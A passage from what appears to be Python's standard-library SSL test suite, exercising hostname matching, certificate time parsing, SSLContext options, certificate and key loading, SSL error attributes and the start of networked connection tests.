commonName cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT', 'subject': ((('countryName', 'US'),), (('stateOrProvinceName', 'California'),), (('localityName', 'Mountain View'),), (('organizationName', 'Google Inc'),)), 'subjectAltName': (('othername', 'blabla'),)} fail(cert, 'google.com') # Empty cert / no cert self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com') self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com') # Issue #17980: avoid denials of service by refusing more than one # wildcard per fragment. cert = {'subject': ((('commonName', 'a*b.com'),),)} ok(cert, 'axxb.com') cert = {'subject': ((('commonName', 'a*b.co*'),),)} fail(cert, 'axxb.com') cert = {'subject': ((('commonName', 'a*b*.com'),),)} with self.assertRaises(ssl.CertificateError) as cm: ssl.match_hostname(cert, 'axxbxxc.com') self.assertIn("too many wildcards", str(cm.exception)) def test_server_side(self): # server_hostname doesn't work for server sockets ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) with closing(socket.socket()) as sock: self.assertRaises(ValueError, ctx.wrap_socket, sock, True, server_hostname="some.hostname") def test_unknown_channel_binding(self): # should raise ValueError for unknown type s = socket.socket(socket.AF_INET) with closing(ssl.wrap_socket(s)) as ss: with self.assertRaises(ValueError): ss.get_channel_binding("unknown-type") @unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES, "'tls-unique' channel binding not available") def test_tls_unique_channel_binding(self): # unconnected should return None for known type s = socket.socket(socket.AF_INET) with closing(ssl.wrap_socket(s)) as ss: self.assertIsNone(ss.get_channel_binding("tls-unique")) # the same for server-side s = socket.socket(socket.AF_INET) with closing(ssl.wrap_socket(s, server_side=True, certfile=CERTFILE)) as ss: self.assertIsNone(ss.get_channel_binding("tls-unique")) def test_get_default_verify_paths(self): paths = ssl.get_default_verify_paths() self.assertEqual(len(paths), 6) self.assertIsInstance(paths, ssl.DefaultVerifyPaths) with support.EnvironmentVarGuard() as env: env["SSL_CERT_DIR"] = CAPATH env["SSL_CERT_FILE"] = CERTFILE paths = ssl.get_default_verify_paths() self.assertEqual(paths.cafile, CERTFILE) self.assertEqual(paths.capath, CAPATH) @unittest.skipUnless(sys.platform == "win32", "Windows specific") def test_enum_certificates(self): self.assertTrue(ssl.enum_certificates("CA")) self.assertTrue(ssl.enum_certificates("ROOT")) self.assertRaises(TypeError, ssl.enum_certificates) self.assertRaises(WindowsError, ssl.enum_certificates, "") trust_oids = set() for storename in ("CA", "ROOT"): store = ssl.enum_certificates(storename) self.assertIsInstance(store, list) for element in store: self.assertIsInstance(element, tuple) self.assertEqual(len(element), 3) cert, enc, trust = element self.assertIsInstance(cert, bytes) self.assertIn(enc, {"x509_asn", "pkcs_7_asn"}) self.assertIsInstance(trust, (set, bool)) if isinstance(trust, set): trust_oids.update(trust) serverAuth = "1.3.6.1.5.5.7.3.1" self.assertIn(serverAuth, trust_oids) @unittest.skipUnless(sys.platform == "win32", "Windows specific") def test_enum_crls(self): self.assertTrue(ssl.enum_crls("CA")) self.assertRaises(TypeError, ssl.enum_crls) self.assertRaises(WindowsError, ssl.enum_crls, "") crls = ssl.enum_crls("CA") self.assertIsInstance(crls, list) for element in crls: self.assertIsInstance(element, tuple) self.assertEqual(len(element), 2) self.assertIsInstance(element[0], bytes) self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"}) def test_asn1object(self): expected = (129, 'serverAuth', 'TLS Web Server Authentication', '1.3.6.1.5.5.7.3.1') val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1') self.assertEqual(val, expected) self.assertEqual(val.nid, 129) self.assertEqual(val.shortname, 'serverAuth') self.assertEqual(val.longname, 'TLS Web Server Authentication') self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1') self.assertIsInstance(val, ssl._ASN1Object) self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth') val = ssl._ASN1Object.fromnid(129) self.assertEqual(val, expected) self.assertIsInstance(val, ssl._ASN1Object) self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1) with self.assertRaisesRegexp(ValueError, "unknown NID 100000"): ssl._ASN1Object.fromnid(100000) for i in range(1000): try: obj = ssl._ASN1Object.fromnid(i) except ValueError: pass else: self.assertIsInstance(obj.nid, int) self.assertIsInstance(obj.shortname, str) self.assertIsInstance(obj.longname, str) self.assertIsInstance(obj.oid, (str, type(None))) val = ssl._ASN1Object.fromname('TLS Web Server Authentication') self.assertEqual(val, expected) self.assertIsInstance(val, ssl._ASN1Object) self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected) self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'), expected) with self.assertRaisesRegexp(ValueError, "unknown object 'serverauth'"): ssl._ASN1Object.fromname('serverauth') def test_purpose_enum(self): val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1') self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object) self.assertEqual(ssl.Purpose.SERVER_AUTH, val) self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129) self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth') self.assertEqual(ssl.Purpose.SERVER_AUTH.oid, '1.3.6.1.5.5.7.3.1') val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2') self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object) self.assertEqual(ssl.Purpose.CLIENT_AUTH, val) self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130) self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth') self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid, '1.3.6.1.5.5.7.3.2') def test_unsupported_dtls(self): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.addCleanup(s.close) with self.assertRaises(NotImplementedError) as cx: ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE) self.assertEqual(str(cx.exception), "only stream sockets are supported") ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) with self.assertRaises(NotImplementedError) as cx: ctx.wrap_socket(s) self.assertEqual(str(cx.exception), "only stream sockets are supported") def cert_time_ok(self, timestring, timestamp): self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp) def cert_time_fail(self, timestring): with self.assertRaises(ValueError): ssl.cert_time_to_seconds(timestring) @unittest.skipUnless(utc_offset(), 'local time needs to be different from UTC') def test_cert_time_to_seconds_timezone(self): # Issue #19940: ssl.cert_time_to_seconds() returns wrong # results if local timezone is not UTC self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0) self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0) def test_cert_time_to_seconds(self): timestring = "Jan 5 09:34:43 2018 GMT" ts = 1515144883.0 self.cert_time_ok(timestring, ts) # accept keyword parameter, assert its name self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts) # accept both %e and %d (space or zero generated by strftime) self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts) # case-insensitive self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts) self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute newyear_ts = 1230768000.0 # leap seconds self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts) # same timestamp self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts) self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899) # allow 60th second (even if it is not a leap second) self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900) # allow 2nd leap second for compatibility with time.strptime() self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901) self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds # no special treatement for the special value: # 99991231235959Z (rfc 5280) self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0) @support.run_with_locale('LC_ALL', '') def test_cert_time_to_seconds_locale(self): # `cert_time_to_seconds()` should be locale independent def local_february_name(): return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0)) if local_february_name().lower() == 'feb': self.skipTest("locale-specific month name needs to be " "different from C locale") # locale-independent self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0) self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT") class ContextTests(unittest.TestCase): @skip_if_broken_ubuntu_ssl def test_constructor(self): for protocol in PROTOCOLS: ssl.SSLContext(protocol) self.assertRaises(TypeError, ssl.SSLContext) self.assertRaises(ValueError, ssl.SSLContext, -1) self.assertRaises(ValueError, ssl.SSLContext, 42) @skip_if_broken_ubuntu_ssl def test_protocol(self): for proto in PROTOCOLS: ctx = ssl.SSLContext(proto) self.assertEqual(ctx.protocol, proto) def test_ciphers(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.set_ciphers("ALL") ctx.set_ciphers("DEFAULT") with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"): ctx.set_ciphers("^$:,;?*'dorothyx") @skip_if_broken_ubuntu_ssl def test_options(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) # OP_ALL | OP_NO_SSLv2 is the default value self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2, ctx.options) ctx.options |= ssl.OP_NO_SSLv3 self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3, ctx.options) if can_clear_options(): ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1 self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3, ctx.options) ctx.options = 0 self.assertEqual(0, ctx.options) else: with self.assertRaises(ValueError): ctx.options = 0 def test_verify_mode(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) # Default value self.assertEqual(ctx.verify_mode, ssl.CERT_NONE) ctx.verify_mode = ssl.CERT_OPTIONAL self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL) ctx.verify_mode = ssl.CERT_REQUIRED self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED) ctx.verify_mode = ssl.CERT_NONE self.assertEqual(ctx.verify_mode, ssl.CERT_NONE) with self.assertRaises(TypeError): ctx.verify_mode = None with self.assertRaises(ValueError): ctx.verify_mode = 42 @unittest.skipUnless(have_verify_flags(), "verify_flags need OpenSSL > 0.9.8") def test_verify_flags(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) # default value tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0) self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf) ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF) ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN) ctx.verify_flags = ssl.VERIFY_DEFAULT self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT) # supports any value ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT) with self.assertRaises(TypeError): ctx.verify_flags = None def test_load_cert_chain(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) # Combined key and cert in a single file ctx.load_cert_chain(CERTFILE, keyfile=None) ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE) self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE) with self.assertRaises(IOError) as cm: ctx.load_cert_chain(WRONGCERT) self.assertEqual(cm.exception.errno, errno.ENOENT) with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"): ctx.load_cert_chain(BADCERT) with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"): ctx.load_cert_chain(EMPTYCERT) # Separate key and cert ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.load_cert_chain(ONLYCERT, ONLYKEY) ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY) ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY) with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"): ctx.load_cert_chain(ONLYCERT) with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"): ctx.load_cert_chain(ONLYKEY) with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"): ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT) # Mismatching key and cert ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) with self.assertRaisesRegexp(ssl.SSLError, "key values mismatch"): ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY) # Password protected key and cert ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD) ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode()) ctx.load_cert_chain(CERTFILE_PROTECTED, password=bytearray(KEY_PASSWORD.encode())) ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD) ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode()) ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, bytearray(KEY_PASSWORD.encode())) with self.assertRaisesRegexp(TypeError, "should be a string"): ctx.load_cert_chain(CERTFILE_PROTECTED, password=True) with self.assertRaises(ssl.SSLError): ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass") with self.assertRaisesRegexp(ValueError, "cannot be longer"): # openssl has a fixed limit on the password buffer. # PEM_BUFSIZE is generally set to 1kb. # Return a string larger than this. ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400) # Password callback def getpass_unicode(): return KEY_PASSWORD def getpass_bytes(): return KEY_PASSWORD.encode() def getpass_bytearray(): return bytearray(KEY_PASSWORD.encode()) def getpass_badpass(): return "badpass" def getpass_huge(): return b'a' * (1024 * 1024) def getpass_bad_type(): return 9 def getpass_exception(): raise Exception('getpass error') class GetPassCallable: def __call__(self): return KEY_PASSWORD def getpass(self): return KEY_PASSWORD ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode) ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes) ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray) ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable()) ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable().getpass) with self.assertRaises(ssl.SSLError): ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass) with self.assertRaisesRegexp(ValueError, "cannot be longer"): ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge) with self.assertRaisesRegexp(TypeError, "must return a string"): ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type) with self.assertRaisesRegexp(Exception, "getpass error"): ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception) # Make sure the password function isn't called if it isn't needed ctx.load_cert_chain(CERTFILE, password=getpass_exception) def test_load_verify_locations(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.load_verify_locations(CERTFILE) ctx.load_verify_locations(cafile=CERTFILE, capath=None) ctx.load_verify_locations(BYTES_CERTFILE) ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None) ctx.load_verify_locations(cafile=BYTES_CERTFILE.decode('utf-8')) self.assertRaises(TypeError, ctx.load_verify_locations) self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None) with self.assertRaises(IOError) as cm: ctx.load_verify_locations(WRONGCERT) self.assertEqual(cm.exception.errno, errno.ENOENT) with self.assertRaises(IOError): ctx.load_verify_locations(u'') with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"): ctx.load_verify_locations(BADCERT) ctx.load_verify_locations(CERTFILE, CAPATH) ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH) # Issue #10989: crash if the second argument type is invalid self.assertRaises(TypeError, ctx.load_verify_locations, None, True) def test_load_verify_cadata(self): # test cadata with open(CAFILE_CACERT) as f: cacert_pem = f.read().decode("ascii") cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem) with open(CAFILE_NEURONIO) as f: neuronio_pem = f.read().decode("ascii") neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem) # test PEM ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0) ctx.load_verify_locations(cadata=cacert_pem) self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1) ctx.load_verify_locations(cadata=neuronio_pem) self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2) # cert already in hash table ctx.load_verify_locations(cadata=neuronio_pem) self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2) # combined ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) combined = "\n".join((cacert_pem, neuronio_pem)) ctx.load_verify_locations(cadata=combined) self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2) # with junk around the certs ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) combined = ["head", cacert_pem, "other", neuronio_pem, "again", neuronio_pem, "tail"] ctx.load_verify_locations(cadata="\n".join(combined)) self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2) # test DER ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.load_verify_locations(cadata=cacert_der) ctx.load_verify_locations(cadata=neuronio_der) self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2) # cert already in hash table ctx.load_verify_locations(cadata=cacert_der) self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2) # combined ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) combined = b"".join((cacert_der, neuronio_der)) ctx.load_verify_locations(cadata=combined) self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2) # error cases ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object) with self.assertRaisesRegexp(ssl.SSLError, "no start line"): ctx.load_verify_locations(cadata=u"broken") with self.assertRaisesRegexp(ssl.SSLError, "not enough data"): ctx.load_verify_locations(cadata=b"broken") def test_load_dh_params(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.load_dh_params(DHFILE) if os.name != 'nt': ctx.load_dh_params(BYTES_DHFILE) self.assertRaises(TypeError, ctx.load_dh_params) self.assertRaises(TypeError, ctx.load_dh_params, None) with self.assertRaises(IOError) as cm: ctx.load_dh_params(WRONGCERT) self.assertEqual(cm.exception.errno, errno.ENOENT) with self.assertRaises(ssl.SSLError) as cm: ctx.load_dh_params(CERTFILE) @skip_if_broken_ubuntu_ssl def test_session_stats(self): for proto in PROTOCOLS: ctx = ssl.SSLContext(proto) self.assertEqual(ctx.session_stats(), { 'number': 0, 'connect': 0, 'connect_good': 0, 'connect_renegotiate': 0, 'accept': 0, 'accept_good': 0, 'accept_renegotiate': 0, 'hits': 0, 'misses': 0, 'timeouts': 0, 'cache_full': 0, }) def test_set_default_verify_paths(self): # There's not much we can do to test that it acts as expected, # so just check it doesn't crash or raise an exception. ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.set_default_verify_paths() @unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build") def test_set_ecdh_curve(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.set_ecdh_curve("prime256v1") ctx.set_ecdh_curve(b"prime256v1") self.assertRaises(TypeError, ctx.set_ecdh_curve) self.assertRaises(TypeError, ctx.set_ecdh_curve, None) self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo") self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo") @needs_sni def test_sni_callback(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) # set_servername_callback expects a callable, or None self.assertRaises(TypeError, ctx.set_servername_callback) self.assertRaises(TypeError, ctx.set_servername_callback, 4) self.assertRaises(TypeError, ctx.set_servername_callback, "") self.assertRaises(TypeError, ctx.set_servername_callback, ctx) def dummycallback(sock, servername, ctx): pass ctx.set_servername_callback(None) ctx.set_servername_callback(dummycallback) @needs_sni def test_sni_callback_refcycle(self): # Reference cycles through the servername callback are detected # and cleared. ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) def dummycallback(sock, servername, ctx, cycle=ctx): pass ctx.set_servername_callback(dummycallback) wr = weakref.ref(ctx) del ctx, dummycallback gc.collect() self.assertIs(wr(), None) def test_cert_store_stats(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) self.assertEqual(ctx.cert_store_stats(), {'x509_ca': 0, 'crl': 0, 'x509': 0}) ctx.load_cert_chain(CERTFILE) self.assertEqual(ctx.cert_store_stats(), {'x509_ca': 0, 'crl': 0, 'x509': 0}) ctx.load_verify_locations(CERTFILE) self.assertEqual(ctx.cert_store_stats(), {'x509_ca': 0, 'crl': 0, 'x509': 1}) ctx.load_verify_locations(CAFILE_CACERT) self.assertEqual(ctx.cert_store_stats(), {'x509_ca': 1, 'crl': 0, 'x509': 2}) def test_get_ca_certs(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) self.assertEqual(ctx.get_ca_certs(), []) # CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE ctx.load_verify_locations(CERTFILE) self.assertEqual(ctx.get_ca_certs(), []) # but CAFILE_CACERT is a CA cert ctx.load_verify_locations(CAFILE_CACERT) self.assertEqual(ctx.get_ca_certs(), [{'issuer': ((('organizationName', 'Root CA'),), (('organizationalUnitName', 'http://www.cacert.org'),), (('commonName', 'CA Cert Signing Authority'),), (('emailAddress', 'support@cacert.org'),)), 'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'), 'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'), 'serialNumber': '00', 'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',), 'subject': ((('organizationName', 'Root CA'),), (('organizationalUnitName', 'http://www.cacert.org'),), (('commonName', 'CA Cert Signing Authority'),), (('emailAddress', 'support@cacert.org'),)), 'version': 3}]) with open(CAFILE_CACERT) as f: pem = f.read() der = ssl.PEM_cert_to_DER_cert(pem) self.assertEqual(ctx.get_ca_certs(True), [der]) def test_load_default_certs(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.load_default_certs() ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.load_default_certs(ssl.Purpose.SERVER_AUTH) ctx.load_default_certs() ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH) ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) self.assertRaises(TypeError, ctx.load_default_certs, None) self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH') @unittest.skipIf(sys.platform == "win32", "not-Windows specific") def test_load_default_certs_env(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) with support.EnvironmentVarGuard() as env: env["SSL_CERT_DIR"] = CAPATH env["SSL_CERT_FILE"] = CERTFILE ctx.load_default_certs() self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0}) @unittest.skipUnless(sys.platform == "win32", "Windows specific") def test_load_default_certs_env_windows(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.load_default_certs() stats = ctx.cert_store_stats() ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) with support.EnvironmentVarGuard() as env: env["SSL_CERT_DIR"] = CAPATH env["SSL_CERT_FILE"] = CERTFILE ctx.load_default_certs() stats["x509"] += 1 self.assertEqual(ctx.cert_store_stats(), stats) def test_create_default_context(self): ctx = ssl.create_default_context() self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23) self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED) self.assertTrue(ctx.check_hostname) self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2) self.assertEqual( ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0), getattr(ssl, "OP_NO_COMPRESSION", 0), ) with open(SIGNING_CA) as f: cadata = f.read().decode("ascii") ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH, cadata=cadata) self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23) self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED) self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2) self.assertEqual( ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0), getattr(ssl, "OP_NO_COMPRESSION", 0), ) ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23) self.assertEqual(ctx.verify_mode, ssl.CERT_NONE) self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2) self.assertEqual( ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0), getattr(ssl, "OP_NO_COMPRESSION", 0), ) self.assertEqual( ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0), getattr(ssl, "OP_SINGLE_DH_USE", 0), ) self.assertEqual( ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0), getattr(ssl, "OP_SINGLE_ECDH_USE", 0), ) def test__create_stdlib_context(self): ctx = ssl._create_stdlib_context() self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23) self.assertEqual(ctx.verify_mode, ssl.CERT_NONE) self.assertFalse(ctx.check_hostname) self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2) ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1) self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1) self.assertEqual(ctx.verify_mode, ssl.CERT_NONE) self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2) ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1, cert_reqs=ssl.CERT_REQUIRED, check_hostname=True) self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1) self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED) self.assertTrue(ctx.check_hostname) self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2) ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH) self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23) self.assertEqual(ctx.verify_mode, ssl.CERT_NONE) self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2) def test_check_hostname(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) self.assertFalse(ctx.check_hostname) # Requires CERT_REQUIRED or CERT_OPTIONAL with self.assertRaises(ValueError): ctx.check_hostname = True ctx.verify_mode = ssl.CERT_REQUIRED self.assertFalse(ctx.check_hostname) ctx.check_hostname = True self.assertTrue(ctx.check_hostname) ctx.verify_mode = ssl.CERT_OPTIONAL ctx.check_hostname = True self.assertTrue(ctx.check_hostname) # Cannot set CERT_NONE with check_hostname enabled with self.assertRaises(ValueError): ctx.verify_mode = ssl.CERT_NONE ctx.check_hostname = False self.assertFalse(ctx.check_hostname) class SSLErrorTests(unittest.TestCase): def test_str(self): # The str() of a SSLError doesn't include the errno e = ssl.SSLError(1, "foo") self.assertEqual(str(e), "foo") self.assertEqual(e.errno, 1) # Same for a subclass e = ssl.SSLZeroReturnError(1, "foo") self.assertEqual(str(e), "foo") self.assertEqual(e.errno, 1) def test_lib_reason(self): # Test the library and reason attributes ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) with self.assertRaises(ssl.SSLError) as cm: ctx.load_dh_params(CERTFILE) self.assertEqual(cm.exception.library, 'PEM') self.assertEqual(cm.exception.reason, 'NO_START_LINE') s = str(cm.exception) self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s) def test_subclass(self): # Check that the appropriate SSLError subclass is raised # (this only tests one of them) ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) with closing(socket.socket()) as s: s.bind(("127.0.0.1", 0)) s.listen(5) c = socket.socket() c.connect(s.getsockname()) c.setblocking(False) with closing(ctx.wrap_socket(c, False, do_handshake_on_connect=False)) as c: with self.assertRaises(ssl.SSLWantReadError) as cm: c.do_handshake() s = str(cm.exception) self.assertTrue(s.startswith("The operation did not complete (read)"), s) # For compatibility self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ) class NetworkedTests(unittest.TestCase): def test_connect(self): with support.transient_internet(REMOTE_HOST): s = ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_NONE) try: s.connect((REMOTE_HOST, 443)) self.assertEqual({}, s.getpeercert()) finally: s.close() # this should fail because we have no verification certs s = ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_REQUIRED) self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed", s.connect, (REMOTE_HOST, 443)) s.close() # this should succeed because we specify the root cert s = ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_REQUIRED, ca_certs=REMOTE_ROOT_CERT) try: s.connect((REMOTE_HOST, 443)) self.assertTrue(s.getpeercert()) finally: s.close() def 